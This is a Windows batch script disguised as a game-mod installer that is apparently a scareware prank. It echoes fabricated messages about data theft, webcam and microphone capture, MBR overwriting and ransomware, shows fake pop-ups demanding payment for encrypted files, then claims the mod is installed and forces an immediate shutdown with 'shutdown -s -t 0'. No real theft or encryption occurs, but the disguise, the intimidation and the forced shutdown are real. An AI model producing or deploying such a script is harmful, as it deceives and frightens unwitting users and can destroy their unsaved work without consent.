@ Echo off
Title INSTALL MOD
powershell -command "Add-Type -AssemblyName PresentationFramework; [System.Windows.MessageBox]::Show('Click OK to install mod.')"
echo 1001101010101011111111101010101
echo 1100101000101001010010100101001
echo 1001101010110010011111010101011
echo 0101010101010101010101010101011
echo 1001001001001010010010101010100
echo 0101001010010101001001000100100
echo Establishing connection...
echo Revealing IP...
echo Signal detected.
echo Intsalling malware...
echo Reseting drives...
echo Disabling pc...
echo You were not supposed to see this.
echo Watching...
echo Listening...
echo [!] Initializing security audit...
timeout /t 2 >nul
echo [Warning] Anomalous activity detected in root directory...
echo WARNING: Unsigned system driver detected.
echo Running heuristic analysis on user behavior...
echo [Critical] Core system files altered at %time%
echo Tracing network footprint...
echo Establishing backdoor connection...
echo WARNING: Rootkit found in system volume.
echo Exporting Browser History to remote server...
echo Analyzing local camera feed...
echo Copying folder: "Documents" to /dev/hidden/cloud...
echo [Status] 45%% of "Photos" uploaded.
echo Capturing microphone input...
echo Searching for saved passwords in memory...
echo [Match Found] Analyzing keystrokes...
echo Identifying Geographic Location...
echo [Done] Your Public IP is: 192.168.1.1
echo Latitude: 46.0667, Longitude: 11.1667
echo ISP: Unknown Proxy...
echo [Status] User location mapped.
echo Installing Trojan.Win32.Generic...
echo Overwriting Master Boot Record (MBR)...
echo [Error] Cannot delete system32... Creating exception.
echo Activating encrypted Ransomware...
echo [Warning] BIOS flashing initiated...
echo I see you.
echo Why are you using such a simple password?
echo This machine belongs to us now.
echo Dont turn off the computer.
echo I know what you did last summer.
echo The camera is watching.
echo Deleting files...
echo Done.
echo Analyzing patterns...
echo Something is not right.
echo Do not close this window.
echo Too late.
powershell -command "Add-Type -AssemblyName PresentationFramework; [System.Windows.MessageBox]::Show('System Failure. Error Code 0x0000042.')"
powershell -command "Add-Type -AssemblyName PresentationFramework; [System.Windows.MessageBox]::Show('Camera access allowed.')"
powershell -command "Add-Type -AssemblyName PresentationFramework; [System.Windows.MessageBox]::Show('Your files have been encrypted. Payment required.')"
timeout /t 4 >nul
powershell -command "Add-Type -AssemblyName PresentationFramework; [System.Windows.MessageBox]::Show('Done! Mod installed.')"
timeout /t 1 >nul
powershell -Command "$null = [Windows.UI.Notifications.ToastNotificationManager, Windows.UI.Notifications, ContentType = WindowsRuntime]; $template = [Windows.UI.Notifications.ToastNotificationManager]::GetTemplateContent([Windows.UI.Notifications.ToastTemplateType]::ToastText01); $textNodes = $template.GetElementsByTagName('text'); $textNodes.Item(0).AppendChild($template.CreateTextNode('You were logged of')) > $null; $toast = [Windows.UI.Notifications.ToastNotification]::new($template); [Windows.UI.Notifications.ToastNotificationManager]::CreateToastNotifier('System').Show($toast);"
timeout /t 3 >nul
shutdown -s -t 0
